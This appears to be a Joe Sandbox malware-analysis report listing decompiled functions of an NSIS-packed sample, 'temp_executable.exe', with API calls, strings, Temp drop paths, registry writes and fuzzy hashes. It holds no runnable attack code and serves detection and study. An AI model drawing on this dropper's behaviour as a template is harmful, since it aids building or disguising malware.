API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
String ID: "$"C:\Users\user\AppData\Local\Temp\temp_executable.exe" $1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens$C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens\Sweatsuit$C:\Users\user\AppData\Local\Temp\temp_executable.exe$Error launching installer$Low$NSIS Error$Pseudosymmetry Setup$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
API String ID: 4107622049-1520195409
Opcode ID: f7f8c4b5207d4c3c8d39ea3bc59535be28d645db3faf0da6b649b370cd1685cb
Instruction ID: ab5bd0cb9fd354075505a922324eb5159d0c68426fb539e9448df04d541e8703
Opcode Fuzzy Hash: f7f8c4b5207d4c3c8d39ea3bc59535be28d645db3faf0da6b649b370cd1685cb
Instruction Fuzzy Hash: 5FB105706082416AE7216F659D8DA2B7EA8AB45306F04047FF581B62E3C77C9E05CB6E

Function 00405BB3 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 199
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32(?,00429000,00000000,00404EB4,00429000,00000000), ref: 00405C64
GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00405CDF
GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405CF2
SHGetSpecialFolderLocation.SHELL32(?,0041AFD0), ref: 00405D2E
SHGetPathFromIDListA.SHELL32(0041AFD0,Call), ref: 00405D3C
CoTaskMemFree.OLE32(0041AFD0), ref: 00405D47
lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D69
lstrlenA.KERNEL32(Call,?,00429000,00000000,00404EB4,00429000,00000000), ref: 00405DBB

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00405CAE
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00405D63
Call, xrefs: 00405BDA, 00405CAC, 00405CC9, 00405CDE, 00405CF1, 00405D0D, 00405D38, 00405D68, 00405D6E, 00405D86, 00405D99, 00405DB4, 00405DBA, 00405DC5, 00405DEF

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-1230650788
Opcode ID: 1bfbfe599053c74d70d9056e629d07aaf569f56c231d7efdbf006e697ef1feef
Instruction ID: 03bbcc83ae8db2cba80ea7df372ba0a8a6f53f324bd5ae32260a6f1a1bd8d9a5
Opcode Fuzzy Hash: 1bfbfe599053c74d70d9056e629d07aaf569f56c231d7efdbf006e697ef1feef
Instruction Fuzzy Hash: 8E61F271A04A05AEEF215B65CC88BBF3BA5DF11704F20813BE901B62D1D27D5882DF5E

Function 00405451 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,764D3410,00000000), ref: 0040547A
lstrcatA.KERNEL32(0042A828,\*.*,0042A828,?,?,C:\Users\user\AppData\Local\Temp\,764D3410,00000000), ref: 004054C2
lstrcatA.KERNEL32(?,00409014,?,0042A828,?,?,C:\Users\user\AppData\Local\Temp\,764D3410,00000000), ref: 004054E3
lstrlenA.KERNEL32(?,?,00409014,?,0042A828,?,?,C:\Users\user\AppData\Local\Temp\,764D3410,00000000), ref: 004054E9
FindFirstFileA.KERNEL32(0042A828,?,?,?,00409014,?,0042A828,?,?,C:\Users\user\AppData\Local\Temp\,764D3410,00000000), ref: 004054FA
FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004055A7
FindClose.KERNEL32(00000000), ref: 004055B8

Strings

\*.*, xrefs: 004054BC
C:\Users\user\AppData\Local\Temp\, xrefs: 0040545F
"C:\Users\user\AppData\Local\Temp\temp_executable.exe" , xrefs: 00405451

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\AppData\Local\Temp\temp_executable.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-2123457157
Opcode ID: 14b20490f48db4f604ba7a7e355ea765e6e76522d2b3a4482e8726861c8d2d22
Instruction ID: aa82d0309f1ddddfbe6c40bd1d7433d9f6730d94ca5b26b608a9a455718634cb
Opcode Fuzzy Hash: 14b20490f48db4f604ba7a7e355ea765e6e76522d2b3a4482e8726861c8d2d22
Instruction Fuzzy Hash: 9D51D030900A04BADB216B618C45BBF7AB9DF86715F14407BF444B61D2D73C9982DEAE

Function 0040231C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040235A
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsfBB16.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040237A
RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsfBB16.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B3
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsfBB16.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402490

Strings

C:\Users\user\AppData\Local\Temp\nsfBB16.tmp, xrefs: 0040236B, 0040238D, 0040239D, 004023A8

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsfBB16.tmp
API String ID: 1356686001-215151647
Opcode ID: 508b578a67204aea12c544e84febf93d2e7aeea21e5f030e7b169d0e0709078f
Instruction ID: 18d1fb4f89ff8b2d67b1f04eab716aa9824ced1508c62e5ffc4d870c518d25f3
Opcode Fuzzy Hash: 508b578a67204aea12c544e84febf93d2e7aeea21e5f030e7b169d0e0709078f
Instruction Fuzzy Hash: 7F1190B1A00118BEEB10ABA5DE89EAF7678FB10358F10403AF905B61D0D7B86D01A668

Function 00402036 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(00407490,?,00000001,00407480,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040208B
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00407480,?,?), ref: 00402143

Strings

C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens\Sweatsuit, xrefs: 004020CB

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens\Sweatsuit
API String ID: 123533781-378292206
Opcode ID: f1d18f11176e237c2cc033a31fb9b692edde4e12a279000898c87f708c8b7624
Instruction ID: e3d685ac9dfc0cba4c7b393403c349ec43a7b6e1f6688ebaafdf98cf5e04d43d
Opcode Fuzzy Hash: f1d18f11176e237c2cc033a31fb9b692edde4e12a279000898c87f708c8b7624
Instruction Fuzzy Hash: CE417D75A00109AFCB00EFA4CE88E9E7BB5BF48354B204269F911FB2D1DA799D41DB54

Function 00405EBC Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,?,00403127,00000008), ref: 00405ECE
LoadLibraryA.KERNELBASE(?,?,?,00403127,00000008), ref: 00405ED9
GetProcAddress.KERNEL32(00000000,?), ref: 00405EEA

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: 6a16e0dd3cc6108475a6e7adf37e54332756fcc3f7317002038e5d5bd84af621
Instruction ID: 664a0ab70e0d061655fae0e19733d53a5cade881539b1a7a2127248cbf20f03b
Opcode Fuzzy Hash: 6a16e0dd3cc6108475a6e7adf37e54332756fcc3f7317002038e5d5bd84af621
Instruction Fuzzy Hash: 34E0C232A04511ABC7109B74EC08A7B73A8EF88650304893EF541F7151DB34BC11ABEE

Function 00405E95 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNELBASE(?,0042B070,0042AC28,00405752,0042AC28,0042AC28,00000000,0042AC28,0042AC28,?,?,764D3410,00405471,?,C:\Users\user\AppData\Local\Temp\,764D3410), ref: 00405EA0
FindClose.KERNEL32(00000000), ref: 00405EAC

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 45004ede6c553f1c155b4d32efd02d1a694f01ec3798d929b8bcbd89b235e1a6
Instruction ID: beb1acdad78be98fe1ce0201480667c0c5eddde0777449e7049f749fb66a5638
Opcode Fuzzy Hash: 45004ede6c553f1c155b4d32efd02d1a694f01ec3798d929b8bcbd89b235e1a6
Instruction Fuzzy Hash: EDD01232D0E4309BD3115B38AC0C84BBA58DB053317608B33B8A5F13E0D3349D529AED

Function 00402645 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNELBASE(00000000,?,00000002), ref: 00402654

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 1f146cd9d29f21cce062e12bf8477e486132f18186281bfc9247f7fd0a66074d
Instruction ID: d998dab733500fc6835523815e3f31be6148439617fe8245f85c198535f3b19e
Opcode Fuzzy Hash: 1f146cd9d29f21cce062e12bf8477e486132f18186281bfc9247f7fd0a66074d
Instruction Fuzzy Hash: 9CF0A072608110ABD700E7B89949AEEB768DB21324F60467BE141B20C1D7B89A41EA2A

Function 0040361A Relevance: 49.2, APIs: 15, Strings: 13, Instructions: 216
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00405EBC: GetModuleHandleA.KERNEL32(?,?,?,00403127,00000008), ref: 00405ECE
Part of subcall function 00405EBC: LoadLibraryA.KERNELBASE(?,?,?,00403127,00000008), ref: 00405ED9
Part of subcall function 00405EBC: GetProcAddress.KERNEL32(00000000,?), ref: 00405EEA

lstrcatA.KERNEL32(1033,00429820,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429820,00000000,00000006,C:\Users\user\AppData\Local\Temp\,764D3410,"C:\Users\user\AppData\Local\Temp\temp_executable.exe" ,00000000), ref: 00403695
lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens,1033,00429820,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429820,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 0040370A
lstrcmpiA.KERNEL32(?,.exe), ref: 0040371D
GetFileAttributesA.KERNEL32(Call), ref: 00403728
LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens), ref: 00403771

Part of subcall function 00405AEF: wsprintfA.USER32 ref: 00405AFC

RegisterClassA.USER32(0042DB40), ref: 004037AE
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004037C6
CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 004037FB
ShowWindow.USER32(00000005,00000000), ref: 00403831
LoadLibraryA.KERNEL32(RichEd20), ref: 00403842
LoadLibraryA.KERNEL32(RichEd32), ref: 0040384D
GetClassInfoA.USER32(00000000,RichEdit20A,0042DB40), ref: 0040385D
GetClassInfoA.USER32(00000000,RichEdit,0042DB40), ref: 0040386A
RegisterClassA.USER32(0042DB40), ref: 00403873
DialogBoxParamA.USER32(?,00000000,004039AC,00000000), ref: 00403892

Strings

RichEdit, xrefs: 00403864
C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens, xrefs: 004036A4, 004036AC, 00403744, 0040374A, 0040375A
Control Panel\Desktop\ResourceLocale, xrefs: 0040364E
RichEd20, xrefs: 0040383D
.DEFAULT\Control Panel\International, xrefs: 00403680
.exe, xrefs: 00403717
Call, xrefs: 004036D8, 004036E0, 004036ED, 00403737, 0040373D
C:\Users\user\AppData\Local\Temp\, xrefs: 00403626
RichEd32, xrefs: 00403848
"C:\Users\user\AppData\Local\Temp\temp_executable.exe" , xrefs: 0040361E
RichEdit20A, xrefs: 00403855, 0040385B
_Nb, xrefs: 0040378D, 004037F5
1033, xrefs: 0040363A, 00403690

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\AppData\Local\Temp\temp_executable.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 914957316-2530288679
Opcode ID: 5d3310b5a1c8becea85e3e4cd1ba9fd0528a7c4b850719062e04f152db35815d
Instruction ID: d178aa451f166566eaf2c3163fe56623853c288c4747cf6087cde58c0eecb14b
Opcode Fuzzy Hash: 5d3310b5a1c8becea85e3e4cd1ba9fd0528a7c4b850719062e04f152db35815d
Instruction Fuzzy Hash: 2961B4B1B442406ED620AF629C45F273EACE745749F40457EF904B72E1C77DAD02CA2D

Function 00402C29 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402C3A
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\temp_executable.exe,00000400), ref: 00402C56

Part of subcall function 00405822: GetFileAttributesA.KERNELBASE(?,00402C69,C:\Users\user\AppData\Local\Temp\temp_executable.exe,80000000,?), ref: 00405826
Part of subcall function 00405822: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405848

GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp\temp_executable.exe,C:\Users\user\AppData\Local\Temp\temp_executable.exe,80000000,?), ref: 00402CA2

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00402C33
Error launching installer, xrefs: 00402C79
soft, xrefs: 00402D17
C:\Users\user\AppData\Local\Temp\temp_executable.exe, xrefs: 00402C40, 00402C4F, 00402C63, 00402C83
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E01
"C:\Users\user\AppData\Local\Temp\temp_executable.exe" , xrefs: 00402C29
Null, xrefs: 00402D20
C:\Users\user\AppData\Local\Temp, xrefs: 00402C84, 00402C89, 00402C8F
Inst, xrefs: 00402D0E

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: "C:\Users\user\AppData\Local\Temp\temp_executable.exe" $C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\temp_executable.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 4283519449-3008360872
Opcode ID: 5fd613f8535001b2fdd8dcc1512c25ec0cd79592a89078802bb2e0adc6ce6401
Instruction ID: c80feb63f856711914d44cd07d0e36175ef9d189e1e49feff23a0d5b70f6312c
Opcode Fuzzy Hash: 5fd613f8535001b2fdd8dcc1512c25ec0cd79592a89078802bb2e0adc6ce6401
Instruction Fuzzy Hash: AB51D331A00214ABDB209F65DE89B9E7AB4AB04719F10413BF905B72D1D7BC9D818BAD

Function 0040173F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens\Sweatsuit,00000000,00000000,00000031), ref: 0040177E
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens\Sweatsuit,00000000,00000000,00000031), ref: 004017A8

Part of subcall function 00405B91: lstrcpynA.KERNEL32(?,?,00000400,00403152,Pseudosymmetry Setup,NSIS Error), ref: 00405B9E

Part of subcall function 00404E7C: lstrlenA.KERNEL32(00429000,00000000,0041AFD0,764D23A0,?,?,?,?,?,?,?,?,?,00402FBC,00000000,?), ref: 00404EB5
Part of subcall function 00404E7C: lstrlenA.KERNEL32(00402FBC,00429000,00000000,0041AFD0,764D23A0,?,?,?,?,?,?,?,?,?,00402FBC,00000000), ref: 00404EC5
Part of subcall function 00404E7C: lstrcatA.KERNEL32(00429000,00402FBC,00402FBC,00429000,00000000,0041AFD0,764D23A0), ref: 00404ED8
Part of subcall function 00404E7C: SetWindowTextA.USER32(00429000,00429000), ref: 00404EEA
Part of subcall function 00404E7C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F10
Part of subcall function 00404E7C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F2A
Part of subcall function 00404E7C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F38

Strings

C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens\Sweatsuit, xrefs: 0040176C
Call, xrefs: 0040175B, 00401764, 00401771, 00401783, 00401794, 004017CA, 004017E0, 004017FE, 0040183E, 004018BF, 004018C8, 004018D2, 004018DD
C:\Users\user\AppData\Local\Temp\nsfBB16.tmp, xrefs: 00401789, 004017F8, 00401816
C:\Users\user\AppData\Local\Temp\nsfBB16.tmp\System.dll, xrefs: 0040180C, 00401828

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens\Sweatsuit$C:\Users\user\AppData\Local\Temp\nsfBB16.tmp$C:\Users\user\AppData\Local\Temp\nsfBB16.tmp\System.dll$Call
API String ID: 1941528284-1284537430
